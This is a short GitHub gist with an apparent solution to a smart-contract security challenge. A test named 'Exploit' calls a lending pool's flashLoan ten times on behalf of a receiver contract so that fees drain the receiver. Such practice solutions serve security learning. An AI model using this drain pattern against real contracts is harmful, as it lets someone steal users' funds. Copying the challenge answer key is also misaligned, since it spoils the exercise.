Skip to content

Instantly share code, notes, and snippets.

@az0mb13
Created January 21, 2023 16:08
Embed
What would you like to do?
it('Exploit', async function () {
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
this.pool.connect(attacker).flashLoan(this.receiver.address,0)
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment